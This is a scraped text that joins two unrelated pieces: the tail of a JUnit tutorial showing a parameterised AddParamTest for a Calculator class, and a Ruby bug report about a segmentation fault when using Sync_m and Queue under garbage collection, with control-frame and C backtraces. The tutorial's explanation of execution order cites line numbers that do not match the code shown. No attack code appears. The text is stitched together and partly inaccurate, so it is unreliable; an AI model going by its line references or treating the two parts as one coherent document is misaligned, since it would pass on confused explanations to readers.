assertEquals(-10, cal.sub(x, y)); 36 } 37 38 } Parameterised unit test cases using JUnit If you want to test any method with multiple input values, you would normally have to write multiple test cases for the same method. But if you use the parameterised unit testing technique, you dont need to write multiple test cases for the same method. Lets look at the example of the Calculator class defined in Code-5. If you have to create parameterised test cases for the add() method of the Calculator class with multiple inputs, then consider the following code for that requirement. Code-7 1 package com.emertxe; 2 3 import static org.junit.Assert.*; 4 import java.util.Arrays; 5 import java.util.Collection; 6 import org.junit.Assert; 7 import org.junit.Before; 8 import org.junit.Test; 9 import org.junit.runner.RunWith; 10import org.junit.runners.Parameterized; 11import org.junit.runners.Parameterized.Parameters; 12 13 @RunWith(Parameterized.class) 14 public class AddParamTest { 15 16 private int expectedResult; 17 private int firstVal; 18 private int secondVal; 19 Calculator cal; 20 21 @Before 22 public void init() { 23 24 cal = new Calculator(); 25 } 26 27 public AddParamTest(int expectedResult, int firstVal, int secondVal) { 28 this.expectedResult = expectedResult; 29 this.firstVal = firstVal; 30 this.secondVal = secondVal; 31 } 32 33 @Parameters 34 public static Collection<Object[]> testData() { 35 36 Object[][] data = new Object[][] { { 6, 2, 4 }, { 7, 4, 3 }, 37 { 8, 2, 6 } }; 38 39 return Arrays.asList(data); 40 } 41 42 @Test 43 public void testAdd() { 44 Assert.assertEquals(expectedResult, cal.add(firstVal, secondVal)); 45 } 46 } When the test case written in Code-7 is executed, then an execution occurs in the following order: - Parameterised class at Line 11 is executed. - Static method at Line 32 is executed. - Instance of AddParamTest class at Line 12 is executed. - The data {6,2,4}, {7,4,3} and {8,2,6} at Lines 34-35 is passed to the constructor at Line 24. - testAdd() method at Line 41 is executed. Connect With Us
http://opensourceforu.com/2015/08/unit-testing-in-java-using-the-junit-framework/
CC-MAIN-2017-47
refinedweb
1,190
55.84
Many of the .NET docs use the phrase “TypeDef or TypeRef”. What’s the difference? Both refer to metadata tokens. Each token has a scope for resolving the token, which basically corresponds to a module (a .dll or .exe). IMetaDataImport is the interface for reading metadata from a module. A TypeDef refers to a type definition within a scope. A TypeRef refs to a TypeDef in another scope. So a TypeDef is the “real type definition”. Whereas a TypeRef just refers to a type you imported from another module. A TypeDef contains interesting things like the name, base class (specified as either a TypeDef or TypeRef token), flags, implemented interfaces, methods, fields, and other members. A TypeRef just contains the name and a token (an AssemblyRef or ModuleRef) referring to the other scope. TypeRefs get resolved to TypeDefs by: 1) Finding the IMetaDataImport associated with the AssemblyRef. This is hard because the CLR loads modules dynamically at runtime. (A debugger can do this via ICorDebugModule2::ResolveAssembly) 2) Looking up a TypeDef by name in that new scope. An example: Here’s an example. We have a class hierarchy: Derived2 –> Derived1 –> Base –> System.Object. Derived1 + Derived2 are defined in a dll; Base in another, and System.Object in another (mscorlib.dll). Base.cs: public class Base { public int m_baseField; } Derived.cs: public class Derived2 : Derived1 { public int m_Two; } public class Derived1 : Base { public int m_One; } Compile it like so: csc /t:library base.cs /debug+ csc /t:library derived.cs /debug+ /r:base.dll Simple case: Same module Now, If you enable “show token values” in ILDasm and then crack open derived.dll and view the definition of the Derived2 class, you see: .class /*02000003*/ public auto ansi beforefieldinit Derived2 extends Derived1/*02000002*/ { } // end of class Derived2 Recall that the top 2 digits of a token are the token type which specify which metadata table. Table 02 is TypeDefs, 01 is TypeRefs, and 23 is AssemblyRefs. The bottom 6 digits are the row of the table. So Derived2 is token 02000003, which is TypeDef (02) row 000003, derives from token 02000002, which is the TypeDef for Derived1. Since both classes are defined in the same module, everything here is TypeDefs. Harder case: different modules If you view base.dll and view the definition of the Base class, you see: .class /*02000002*/ public auto ansi beforefieldinit Base extends [mscorlib/*23000001*/]System.Object/*01000001*/ { } // end of class Base We see ‘Base’ gets token 02000002, which is table 02 (typedefs), and row 000002. And it derives from token 01000001, which is TypeRef #1. Ildasm also shows us that TypeRef#1 has the following properties: – a name “System.Object” – a Resolution Scope 23000001, which is row #1 in the AssemblyRef table. ILDasm conveniently looks this up within the module scope and provides the information in the class definition. You can see the assembly ref in the module’s manifest: .assembly extern /*23000001*/ mscorlib { .publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4.. .ver 2:0:0:0 } When an app wants to load an assembly, the loader / fusion / etc can use this information to load the assembly. Compile binding vs. Runtime binding Note that because of runtime binding, The base class for Derived1 is not resolved until Base.dll is actually loaded. So you could compile against one copy of Base.dll, but then swap out a different copy of Base.dll when it actually executes. This usually happens by accident, and could generate a TypeLoadException. Other comments: This Def vs. Ref thing is a common paradigm throughout the metadata. For example, there are AssemblyRefs, MethodDef + MethodRef, FieldDef and FieldRef, etc. What about reflection? There are multiple ways of describing types in .NET. Metadata is very explicit about scopes with a process. In contrast, Reflection tries to hide scopes and hide the distinction between TypeDef and TypeRef. Since reflection can resolve across scopes (or throw a TypeResolve Exception), it can always resolve TypeRefs and thus always present the TypeDef. See for more information about metadata. The blog front: Scott Guthrie: ASP.NET AJAX Documentation Update, Videos and Cool Articles Mix of ASP.NET Mono.Cecil is an open source framework, part of the Mono project, that reads .NET assemblies, but also
https://blogs.msdn.microsoft.com/jmstall/2007/03/23/typedef-vs-typeref/
CC-MAIN-2016-36
refinedweb
709
60.41
UPDATE: The next public class will be the week of September 8th in Oslo, Norway. UPDATE 2: AngularJS: Get Started is now available to Pluralsight subscribers. This course is a small but focused subset of the full class. At the end of last year I put together and taught a 2 day workshop on AngularJS fundamentals at NDC London, which due to popular demand I’m offering as part of a larger class for ProgramUtvikling. Feel free to contact me if you would like an on-site workshop, although my bandwidth for custom training is scarce. From animations to testing and everything in between, this course covers the features of AngularJS with a focus on practical scenarios and real applications. We will see how to build custom services, directives, filters, and controllers while maintaining a separation of concerns with clean JavaScript code. Hands on labs will reinforce concepts. The outline of topics: Some of the material is based on blog posts here on OTC.
http://odetocode.com/blogs/scott/archive/2014/01/21/angularjs-training.aspx
CC-MAIN-2015-06
refinedweb
164
61.67
CodePlexProject Hosting for Open Source Software I have code to create the contentPart for a contenttype but how is a field created and set? eg. I have an imageField that I have added to a contentpart, I need to upload the image and set it's properties when the feature is enabled. The imagefield will be with the belts. string[] martialArts = { "Tae Kwon Do","Escrima","Combat Hapkido" }; foreach (var martialArt in martialArts) { var ma = _contentManager.Create("MartialArt", item => { item.Record.Title = martialArt; var map = item.As(); map.Active = true; }); } string[] belts = { "White","Yellow","Gold","Orange","Green","Purple","Blue","Brown","Black White","Black" }; foreach (var belt in belts) { var beltCreate = _contentManager.Create("Belt", item => { item.Record.Name = belt; }); } var picture = (ImageField)contentItem.As<ProfilePart>().Fields.First(f => f.Name == "Picture"); In the next version it will be easier: contentItem.ProfilePart.Picture Suggestion with the imagefield as well, it would be nice to be able to pick from the media service. Thank you. Is it possible to access parts easily, like "contentItem.ProfilePart.Picture" in 1.1? From inside your cshtml views, yes. You can use Shape Tracing to explore the model and when you click on a property it will show you the @ command to reach that property. But from elsewhere (i.e. normal C# code) you still need to use contentItem.As<ProfilePart>() etc. Thank you for the information. I hope accessing like that from code feature will be added soon. I don't think that's true: if you treat a content item as dynamic, you're in business. dynamic ci = myContentItem; Hmm, I hadn't tried that - seems a bit strange to me to cast an object to dynamic just to access properties that you can get to anyway. Personally I don't see the problem with As<T>, it only takes a few extra characters (and actually with the benefits of Intellisense ultimately requires less keystrokes). I can see where dynamics are preferable in views and with some of the shape related stuff ... but with model objects I just feel happier using strong typing, particularly when it comes to refactoring. dynamic is not a type, so that is not technically casting. As<T> is great but it won't help for fields... See the horrible code Sébastien posted, that you still need to use if you don't want to use dynamic. I really don't mind Fields.First(f => f.Name == "Picture") ... I wouldn't exactly call it 'horrible', it's a fairly straightforward Linq query ... it's not that much more cumbersome than just typing the property name, and it's pretty rare that I actually need to access a field from code. Mostly I'll be building a Part if I need anything more serious than just displaying the field shape as usual. In fact there's only been one single time so far that I've needed access to a field like that; compared to dozens of times using As<T> for parts ... so for me it's not enough of a benefit to outweigh entirely losing Intellisense on the Part accessor. Or maybe I've just got so used to Intellisense over the years that I find dynamics somewhat scary :) Just had some further thoughts on this because, well, dynamic really interests me and Orchard is the first time I've really seen it applied in any significant way. I'm not trying to complain about its usage; quite the opposite, in fact - it opens up some really interesting and powerful scenarios that would otherwise be extremely awkward... But "with great power comes great responsibility" and all that, and also I'm just trying to get my head around exactly what I prefer about the more longhand notation in certain cases. What's worrying me is that there are times when dynamic notation can kind of obfuscate what's really going on and potentially make some things more confusing. Before I go on, I'm going to quickly invent a new extension method for ContentPart. It's a one-liner called Field<T> and it will make Sébastien's longhand code look much nicer :) public static T Field<T>(this ContentPart part, string name) { return (T)(part.Fields.First(f=>f.Name==name)); } So let's suppose for a minute that I'm tracking down a bug in some code written by someone else. I see a line like this: var thing = ContentItem.Something.Else.New; Now; what exactly is going on there? Is "Something" a Part, or could it be an obscure property of ContentItem that I was previously unaware of? I really don't know, and I can't even find out by hovering over it, because dynamic won't give me any information. Then, if I assume it is a Part, what is "Else"? It could be a Record-backed property of that part (perhaps a join to another table) or it could be a field. I still don't know; the only way to find out is to run the thing and debug, and even then the readout the debugger gives me on dynamic objects is frequently very hard to understand! Contrast the above with: var thing = ContentItem .As<Something>() .Field<NewField>("Else") .New; Ok; so it doesn't look quite as pretty, but actually it doesn't look that ugly, especially with my extension method; and there is an immediate and obvious advantage here that I can see at little more than a glance exactly what's going on. I'm drilling into a Part called Something and then a Field called "Else" of type NewField, which has a property called New. I can even hover the mouse over New and see that it's a Boolean (perhaps in the first example I might even have suspected it was some kind of factory method; this code I'm debugging was clearly written by someone with a brazen disregard for conventions!) I can see that there are situations where the dynamic syntax is really very quick and useful; and particularly in Views where the model is dynamic anyway I would of course favor the shorter version. But where there's a possibility of keeping things strongly-typed, which there still is a lot of times you'd be writing this kind of code, I'd rather do so - even if it takes a few extra keystrokes and an extension method or two. But then, I am also just a big fan of the As<T> method, largely because it's pretty much exactly the same as a method I wrote myself months ago in a project I was building, and it's a nice elegant compromise between adding dynamic functionality whilst retaining strong typing. So I really just enjoy using it :) Err, sure, whatever works for you... Look, somebody was saying that they wish the dynamic form that is available from views was also available from code. I merely provided a way to make it work. Now if you prefer the strongly-typed stuff, I can see nothing wrong with that. I was just answering the question. Sorry, I can get carried away sometimes when a point interests me. It is a very cool feature. I guess I just wish there could be a "best of both worlds" where the dynamic objects could still have some form of Intellisense support (I know that's impossible - at least right now ...) It's not impossible: if it can be done at runtime, it can be done in principle at design time. Look at how much IntelliSense can be provided in JavaScript... That's why I said "at least right now..." ;) With all the advances C# has made, who knows what it'll be doing by, say, .NET 6 or 7? Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
http://orchard.codeplex.com/discussions/247620
CC-MAIN-2017-22
refinedweb
1,336
70.84
Building QT5 with OpenGL global namespace errors I'm trying to build the latest QT5 with OpenGL support from source. I've followed the instructions here: I've configured with configure -c++11 -developer-build -opensource -opengl desktop -nomake examples -nomake tests and running nmake from the VS2012 x86 Native Tools Command Prompt. I am getting errors related to OpenGL: qopenglfunctions.h(593) : error C2039: 'glClearDepth' : is not a member of '`global namespace'' qopenglfunctions.h(593) : error C3861: 'glClearDepth' : identifier not found qopenglfunctions.h(715) : error C2039: 'glDepthRange' : is not a member of '`global namespace'' qopenglfunctions.h(715) : error C3861: 'glDepthRange' : identifier not found and also errors like kernel\qopenglcontext.cpp : error C2065: 'GL_PROXY_TEXTURE_2D' : undeclared identifier GL_TEXTURE_WIDTH and glGetTexLevelParameteriv are also undeclared identifiers, similar to GL_PROXY_TEXTURE_2D. Unfortunately I have searched this problem, but could not find a solution. The QT build is successful when I am not passing -opengl desktop to configure. Here is my graphics card and opengl version info: GLEW version 1.9.0 Reporting capabilities of pixelformat 1 Running on a GeForce GT 540M/PCIe/SSE2 from NVIDIA Corporation OpenGL version 4.2.0 is supported If anyone can provide any pointers I would be grateful. Hi. Hmm weird it should build fine with -opengl desktop. Which branch are you building from? Those functions should be found inside of src/gui/opengl/qopenglext.h which gets included from qopengl.h which in turn should be included from qopenglfunctions.h. Having the same trouble with the released version of 5.1.1, using Visual Studio 2012 x64. Any luck?
https://forum.qt.io/topic/24548/building-qt5-with-opengl-global-namespace-errors
CC-MAIN-2017-47
refinedweb
261
59.7
Introduction: Fake Dynamic Price Tag.) Needed Material Here's what we used to build this project: - An Arduino Uno R3 - A standard 16x2 LCD display. We used this one from Adafruit, but as long as it's compatible with the LiquidCrystal library, you should be good. You'll need a few things to wire it up to the Arduino: - some jumper cables - a 220 ohm resistor - a 10k ohm potentiometer (This is for controlling the contrast of the display. If you find a contrast you like, you can replace the potentiometer with a fixed resistor.) First, let's get the display going! Step 1: Wire Up the Display There sure are a lot of pins on the back of that LCD. Luckily, the documentation for the software library we're going to use has a good guide to wiring it up. Check it out. In summary, your wiring should end up like this: - Power: - LCD GND (pin 1) → Arduino GND - LCD VDD (pin 2) → Arduino +5V - LCD RW (pin 5) → Arduino GND - LCD RS (pin 4) → Arduino digital pin 12 - LCD Enable (pin 6) → Arduino digital pin 11 - LCD D4 (pin 11) → digital pin 5 - LCD D5 (pin 12) → digital pin 4 - LCD D6 (pin 13) → digital pin 3 - LCD D7 (pin 14) → digital pin 2 - Wire a 10k potentiometer's legs to Arduino's +5V and GND - Potentiometer's output → LCD VO (pin 3). - LCD BL1 (pin 15) → 220 ohm resistor → Arduino +5V - LCD BL2 (pin 16) → Arduino GND When that's all set, load up one of the example LiquidCrystal projects in the Arduino IDE and see if it works! Remember to double-check the LCD initialization code in the samples – the pin numbers need to be correct or you won't see anything. For example, the "Blink" example has this code, which is correct given the above setup: const int rs = 12, en = 11, d4 = 5, d5 = 4, d6 = 3, d7 = 2; LiquidCrystal lcd(rs, en, d4, d5, d6, d7); Tips - Save yourself some soldering and invest in some crimp ends and header connectors. On projects like this where we're going to cram the electronics into a small case, being able to make short jumper cables is incredibly helpful. - Similarly, heatshrink tubing is really useful to make sure nothing shorts out when it's all pressed up against itself. - Since there are so many things going to GND and +5V, we opted to make a franken-cable (see the photo above) to be as compact as possible. If space were less of an issue, a breadboard or protoshield would have been an easier option. - Some potentiometers are weirdly shaped. Generally, the left lead is used as ground, the rightmost lead as power, and the middle one as output. If yours has two leads on the front and one on the back, the one on the back is the output. Gotchas - If you don't see anything on your LCD, try turning the potentiometer all the way in one direction, then the other. At its lowest contrast, the LCD's content is completely invisible. - If you see really weird gibberish on the LCD, or only one line instead of two, make sure all your connections are secure. We had a faulty connection to ground and it was causing the weirdest display issues. - The LCD initialization code (what gets run by lcd.init() in the setup() function) is important and takes a while. If something is wrong with your display and you suspect a faulty wire, don't expect jiggling things to suddenly make it work. You may need to reset the Arduino so the initialization code has a chance to run properly. - Make sure your wires are pretty short, but not too short. Nothing's worse than having to resolder because you're a few centimeters away from a header. Great! Now let's make it show some fancy things. Step 2: Code: Basics First things first: let's have the display show "Current Price:" on the top line, and a random price in some range on the second. Every so often, let's have the price refresh. This is pretty simple, but will highlight the basic use of the LiquidCrystal library and some of its quirks. First, let's pull in the library and define some constants: #include <LiquidCrystal.h> const uint8_t lcdWidth = 16; const uint8_t lcdHeight = 2; const long minPriceInCents = 50; const long maxPriceInCents = 1999; const unsigned long minMillisBetweenPriceUpdates = 0.25 * 1000; const unsigned long maxMillisBetweenPriceUpdates = 2 * 1000 Great! Those are the parameters for the price range and how often it will refresh. Now let's make an instance of the LCD class provided by the library and initialize it. We'll print something out over the serial console, just to have some reassurance that things are working, even if we don't see anything on the LCD. We'll do that in the setup() function, which runs once after the Arduino boots. Note, though, that we declare the lcd variable outside of setup(), because we want access to it throughout the program. LiquidCrystal lcd(12, 11, 5, 4, 3, 2); void setup() { Serial.begin(9600); lcd.begin(lcdWidth, lcdHeight); Serial.println("LCD initialized"); lcd.print("Current Price:"); } And for the meat, we'll use the built-in random() function and the String() initializer to construct a decimal price. random() only generates integers, so we'll divide its result by 100.0 to get a floating-point value. We'll do this in loop(), so it happens as often as possible, but with a random delay between the constants we defined earlier. void loop() { double price = random(minPriceInCents, maxPriceInCents) / 100.0; String prettyPrice = "$" + String(price, 2); lcd.setCursor(0, 1); lcd.print(prettyPrice); delay(random(minMillisBetweenPriceUpdates, maxMillisBetweenPriceUpdates)); } One thing to note is the call to lcd.setCursor(). The LiquidCrystal library doesn't automatically advance your text to the next line after a print, so we need to manually move the (invisible) cursor to the second line (here 1 – it's zero-based). Also note that we didn't have to print "Current Price:" again; the LCD is not cleared unless you do so manually, so we only have to update dynamic text. Give it a run and you'll quickly see a related problem. If the price was, say, "$14.99" and then "$7.22", the display will show "$7.229". Remember, the display doesn't clear itself unless you tell it to. Even if you print on the same line, any text past what you print will remain. To fix this problem, we have to pad our string with spaces to overwrite any potential garbage. The easiest way to do this is to just tack on a few spaces to our prettyPrice variable: String prettyPrice = "$" + String(price, 2) + " "; With that change in place, we've got a proof of concept! Let's gussy it up a bit. Step 3: Code: Custom Characters One of the coolest features of the LCD module we're using is the ability to create up to 8 custom characters. This is done through the createChar() method. This method takes an array of 8x5 bits that describe which pixels of the LCD to turn on for the given character. There are a few tools online to help generating these arrays. I used this one. If you're not feeling particularly designerly, I recommend using the Threshold filter in Photoshop to turn an image into black-and-white, and converting that to characters. Remember that you have a maximum of 8 custom characters, or 64x5 pixels. I opted for using 6 of those characters for the Amazon arrow logo, and the remaining 2 for a nicer trademark symbol. You can follow the CustomCharacter example in the Arduino IDE for how to use API. This is how I decided to group things: // Define the data for the Trademark characters const size_t trademarkCharCount = 2;<br>const uint8_t trademarkChars[trademarkCharCount][8] = { { B00111, B00010, B00010, B00000, B00000, B00000, B00000, B00000 }, { B10100, B11100, B10100, B00000, B00000, B00000, B00000, B00000 } }; uint8_t firstTrademarkCharByte; // The byte used to print this character; assigned in initCustomChars() Then I used a function like this, called from setup(), to create the characters: void initCustomChars() { firstTrademarkCharByte = 0; for(size_t i = 0; i < trademarkCharCount; i++) { lcd.createChar(logoCharCount + i, (uint8_t *)trademarkChars[i]); } } After that, printing the custom characters is as simple as using lcd.write() with the appropriate bytes. I wrote a helper function to print a range of bytes, and defined printTrademark() in terms of it: void writeRawByteRange(uint8_t line, uint8_t col, uint8_t startValue, size_t numBytes) { for(uint8_t i = 0; i < numBytes; i++) { lcd.setCursor(col + i, line); // need to use write(), not print() - print will turn the integer // value into a string and print *that* lcd.write(startValue + i); } } void printTrademark(uint8_t line, uint8_t col) { writeRawByteRange(line, col, firstTrademarkCharByte, trademarkCharCount); } The Amazon arrow logo was treated in a similar way. See the attached code for full details. Step 4: Code: Niceties To make things a little easier on myself, I added a few niceties to the code. This includes things like: a function for clearing a specific line by overwriting it with spaces, and a function for centering a given string on a line. I also wanted the display to cycle through three distinct phases: - "Dynamic Pricing" with the logo below - "by Amazon" with the logo below - random price display For that, I built a simple system that keeps track of how long a given phase has been active, and after a certain period, moves on to the next one. See the attached code for all the gory details! Step 5: The Box Now, so we don't get the bomb squad called on us, let's make a nice box for the whole thing. We'll be doing this with laser-cut acrylic. There are a lot of online tools for jump-starting the process of making simple boxes. I recommend makercase.com, since it lets you specify the inner dimensions and accounts for the thickness of the material. We measured the Arduino, LCD and 9V battery, and estimated that we'd be able to fit it in a case that was 4" x 2.5" x 2". So, we plugged those into makercase, with an 1/8" thick acrylic. We modified the resulting PDF to add a rounded window for the LCD, and a slot along the bottom for a display tag (more on that later). The resulting file is attached as a PDF. We used acrylic adhesive (the toxic methyl ethyl ketone kind) to assemble four sides of the box. Then we attached the LCD panel to the front with hot glue. Once we had everything working and fitting, we sealed the last two sides of the box with hot glue, so that we could easily take it apart later. Since we weren't expecting the device to receive much wear-and-tear, we left the Arduino and battery unsecured on the bottom of the case. Potential Improvements - We neglected to build in any way to turn the device on or off. Ha. Room for a switch on the bottom or back of the box would have been a good idea. - The slot along the bottom for the hanging tag could have been closer to the front of the box, for improved visibility. Step 6: Blending In And now, the hard part: sneaking it into a store. Whole Foods branding Some things we learned in reverse-engineering Whole Foods and Amazon branding: - Body text is generally in Scala Sans - Header text is in something that looks a lot like Brighton – one of those generic "warm and friendly" fonts - Whole Foods Green is something close to #223323 - Stake out your local store for examples of graphic elements that repeat: they're fond of scalloped borders, sunbursts, and simple vector art. The hanging tag We cut a slit in the bottom of the acrylic case so that we could attach a hanging tag to the box, explaining what's going on. See the attached PDF for an example. This is designed to be cut out and inserted into the slot; it should fit and hold without any adhesive. Shelving As for actually attaching the box to a shelf, Whole Foods uses pretty standard shelving components. We took measurements and found a compatible hook in a hardware store. We affixed the box to the hook with hot glue. If you can't find such a hook, you could try magnets – glue some to the back of the box, and just snap it onto a shelf. Deploy! Place the box at eye-level to attract the attention of passersby. Don't get caught! Best of luck! 2 Discussions Impressive work! You might want to add a line "get more information on dynamic pricing at ..." if you want customers to know what is going on. Interesting! Did the store ever catch you and kick you out, or were they cool with this?
https://www.instructables.com/id/Fake-Dynamic-Price-Tag/
CC-MAIN-2018-34
refinedweb
2,167
70.53
Programming. - Maximilian Gerhardt @Arun-Kapur Using the UART on the Omega2 should be like using any other Linux UART device. For starters, use the program screenor miniterm.py( opkg install python-pyserial) to use the device /dev/ttyS1for UART1. For C code, search e.g. "linux C uart" or "linux C serial port" or see . Documentation is present from the Onion team. That's the first Google result for "Omega2 UART". - Arun Kap! - William Scott . - Chris Stratton @William-Scott said in Programming Serial(UART) in C or C++: . In actuality, correctly using the Omega's UART is a bit complex, requiring quite a bit of configuration, especially as the defaults are a bit unusually less appropriate than on many other systems. @Chris-Stratton Would you be able to share any example code ? @Maximilian. - Maximilian Gerhardt . #include <errno.h> #include <fcntl.h> #include <string.h> #include <termios.h> #include <unistd.h> #include <stdlib.h> #include <stdint.h> #include <stdio.h> #include <string.h> int set_interface_attribs (int fd, int speed, int parity) { struct termios tty; memset (&tty, 0, sizeof tty); if (tcgetattr (fd, &tty) != 0) { fprintf (stderr, "error %d from tcgetattr", errno); return -1; } cfsetospeed (&tty, speed); cfsetispeed (&tty, speed); tty.c_cflag = (tty.c_cflag & ~CSIZE) | CS8; // 8-bit chars // disable IGNBRK for mismatched speed tests; otherwise receive break // as \000 chars tty.c_iflag &= ~IGNBRK; // disable break processing tty.c_lflag = 0; // no signaling chars, no echo, // no canonical processing tty.c_oflag = 0; // no remapping, no delays tty.c_cc[VMIN] = 0; // read doesn't block tty.c_cc[VTIME] = 5; // 0.5 seconds read timeout tty.c_iflag &= ~(IXON | IXOFF | IXANY); // shut off xon/xoff ctrl tty.c_cflag |= (CLOCAL | CREAD);// ignore modem controls, // enable reading tty.c_cflag &= ~(PARENB | PARODD); // shut off parity tty.c_cflag |= parity; tty.c_cflag &= ~CSTOPB; tty.c_cflag &= ~CRTSCTS; if (tcsetattr (fd, TCSANOW, &tty) != 0) { fprintf (stderr, "error %d from tcsetattr", errno); return -1; } return 0; } void set_blocking (int fd, int should_block) { struct termios tty; memset (&tty, 0, sizeof tty); if (tcgetattr (fd, &tty) != 0) { fprintf (stderr, "error %d from tggetattr", errno); return; } tty.c_cc[VMIN] = should_block ? 1 : 0; tty.c_cc[VTIME] = 5; // 0.5 seconds read timeout if (tcsetattr (fd, TCSANOW, &tty) != 0) fprintf (stderr, "error %d setting term attributes", errno); } /* use omega UART1 */ const char *portname = "/dev/ttyS1"; int uartFd = -1; void uart_writestr(const char* string) { write(uartFd, string, strlen(string)); } void uart_write(void* data, size_t len) { write(uartFd, data, len); } ssize_t uart_read(void* buffer, size_t charsToRead) { return read(uartFd, buffer, charsToRead); } int uart_open(const char* port, int baud, int blocking) { uartFd = open (port, O_RDWR | O_NOCTTY | O_SYNC); if (uartFd < 0) { fprintf (stderr, "error %d opening %s: %s", errno, port, strerror (errno)); return -1; } set_interface_attribs (uartFd, baud, 0); // set speed, 8n1 (no parity) set_blocking (uartFd, blocking); //set blocking mode printf("Port %s opened.\n", port); return 1; } int main(int argc, char* argv[] ) { if(!uart_open(portname, B115200, 0)) return -1; for(int i = 0; i < 10; i++) { printf("[+] Writing string to UART.\n"); uart_writestr("Hello world!\n"); usleep(1000 * 1000); } return 0; }
http://community.onion.io/topic/2495/programming-serial-uart-in-c-or-c/2
CC-MAIN-2018-39
refinedweb
499
61.12
Floating Point Standard Types In contrast to Integers, Floats are used to represent numerical values that can contain decimals or fractional parts. This makes floats more versatile, but comes with drawbacks such as slower performance than integers and less well-defined precision. Elements provides two different floating point types with difference sizes (32 and 64 bits). Different from integers, the size does not so much determine the range of numbers that the type can hold, but rather their precision – that is, how many digits of accuracy are provided. Both float types are defined in the RemObjects.Elements.System namespace – which is in scope by default and does not have to be used/imported manually. However, the namespace name can be used to prefix the type names, where necessary, to avoid ambiguities. In addition to the type core names and their aliases, C# also provides the float and double keywords to refer to these same types. Swift also defines additional aliases in the Swift namespace via the Swift Base Library. Probably the most commonly used integer type is Double. See Also - Integers - Floating Point Numbers on Wikipedia
https://docs.elementscompiler.com/API/StandardTypes/Floats/
CC-MAIN-2019-22
refinedweb
186
54.73
20 January 2012 08:48 [Source: ICIS news] (adds updates from paragraph 8 onwards) SINGAPORE (ICIS)--?xml:namespace> The plant will be operated by ABT, which is a fully owned subsidiary of Vinythai, the source added. Production at the new plant will undergo various quality control checks and a series of approval processes for about a month, the source said. “If everything goes according to schedule, we expect to start offering by the end of February,” the source added. Solvay’s in-house Epicerol technology, which requires glycerine as a feedstock to produce ECH, will be used at the new plant, the source said. According to market sources, the facility will use 110,000 tonne/year of refined glycerine. Solvay holds a 59% stake in Vinythai, while PTTGC and General Public hold a 25% and a 16% share, respectively. News of the plant start-up has led players in the glycerine market to expect the region’s spot supply to tighten, which may boost the prices of refined glycerine, market sources said. The prices may rise in the near term after the plant is started up because of the possible lower supply available in the spot market, according to a regular buyer in southeast Asia. “Although [Solvay] is buying [refined glycerine] mostly on a contract basis, there will still be some impact on the spot market because its requirements are significant,” a southeast Asian trader said. However, Solvay is expecting minimal impact on the spot market, especially in the near term, a company source said. “We have contracted most of our glycerine demand,” said the source, who added that the company will not operate the plant at full capacity immediately after the bringing it on stream, hence its lower requirement. Additional reporting by Wong Lei Lei For more
http://www.icis.com/Articles/2012/01/20/9525548/vinythais-new-ech-unit-to-tighten-glycerine-stock-up-prices.html
CC-MAIN-2015-14
refinedweb
298
57.4
import "acln.ro/ioctl" Package ioctl provides facilities to define ioctl numbers and perform ioctls against file descriptors. See the documentation at. For the time being, pacakge ioctl is only tested and used on amd64, and arm (thanks to @tv42), but it should work on other architectures too, based on my (admittedly rather cursory) reading of Linux header files. Please file a bug if the numbers are wrong for your architecture. amd64 arm Package ioctl is pure Go, but running tests requires a C compiler and the appropriate C headers. See internal/cgoioctl. internal/cgoioctl Package ioctl presents itself as a Go module. The current version is v0.9.0. Package ioctl is distributed under the ISC license. A copy of the license can be found in the LICENSE file.
https://search.gocenter.io/acln.ro/ioctl
CC-MAIN-2021-04
refinedweb
130
65.93
Backport #9168closed Segfault with Sync_m, Queue, and garbage collection Description =begin I am able to reliably generate a segmentation fault when using Sync_m & Queue together. The issue appears garbage collection related as well, as if I (({GC.disable})) the issue goes away. This is the bottom of the output generated by the script and the top of the debug output (the full thing is in the attachment) ... ... ... Starting 1766 Starting 1767 Starting 1768 Starting 1769 Finalizing 1187 Finalizing 1188 Finalizing 1189 Finalizing 1190 Finalizing 1186 Finalizing 1191 Finalizing 1192 Finalizing 1193 Finalizing 1195 Finalizing 1196 Finalizing 1197 Finalizing 1198 Finalizing 1194 Finalizing 1199 Finalizing 1200 Finalizing 1201 /usr/lib64/ruby/2.0.0/thread.rb:187: [BUG] Segmentation fault ruby 2.0.0p353 (2013-11-22 revision 43784) [x86_64-linux] -- Control frame information ----------------------------------------------- c:0005 p:0028 s:0016 e:000015 METHOD /usr/lib64/ruby/2.0.0/thread.rb:187 c:0004 p:0083 s:0012 e:000011 BLOCK /tmp/test.rb:22 [FINISH] c:0003 p:---- s:0008 e:000007 CFUNC :times c:0002 p:0055 s:0005 E:001f80 EVAL /tmp/test.rb:16 [FINISH] c:0001 p:0000 s:0002 E:001dc8 TOP [FINISH] /tmp/test.rb:16:in <main>' /tmp/test.rb:16:in times' /tmp/test.rb:22:in block in <main>' /usr/lib64/ruby/2.0.0/thread.rb:187:in pop' -- C level backtrace information ------------------------------------------- /usr/lib64/libruby20.so.2.0(+0x1c1f3f) [0x7fc0ee2d9f3f] vm_dump.c:647 /usr/lib64/libruby20.so.2.0(+0x66a1e) [0x7fc0ee17ea1e] error.c:283 /usr/lib64/libruby20.so.2.0(rb_bug+0xe7) [0x7fc0ee17eb3b] error.c:302 /usr/lib64/libruby20.so.2.0(+0x13a406) [0x7fc0ee252406] signal.c:672 /lib64/libc.so.6(+0x38270) [0x7fc0edda0270] /usr/lib64/libruby20.so.2.0(+0x1bdf17) [0x7fc0ee2d5f17] vm.c:1234 /usr/lib64/libruby20.so.2.0(+0x1bc767) [0x7fc0ee2d4767] vm.c:648 /usr/lib64/libruby20.so.2.0(+0x1bc896) [0x7fc0ee2d4896] vm.c:679 /usr/lib64/libruby20.so.2.0(+0x1b8e67) [0x7fc0ee2d0e67] vm_eval.c:930 /usr/lib64/libruby20.so.2.0(rb_yield+0x38) [0x7fc0ee2d0ea1] vm_eval.c:940 /usr/lib64/libruby20.so.2.0(+0xc1d82) [0x7fc0ee1d9d82] numeric.c:3588 /usr/lib64/libruby20.so.2.0(+0x1a91a5) [0x7fc0ee2c11a5] vm_insnhelper.c:1336 /usr/lib64/libruby20.so.2.0(+0x1a9d2a) [0x7fc0ee2c1d2a] vm_insnhelper.c:1474 /usr/lib64/libruby20.so.2.0(+0x1a9e37) [0x7fc0ee2c1e37] vm_insnhelper.c:1564 /usr/lib64/libruby20.so.2.0(+0x1aa898) [0x7fc0ee2c2898] vm_insnhelper.c:1758 /usr/lib64/libruby20.so.2.0(+0x1ab0e5) [0x7fc0ee2c30e5] vm_insnhelper.c:1916 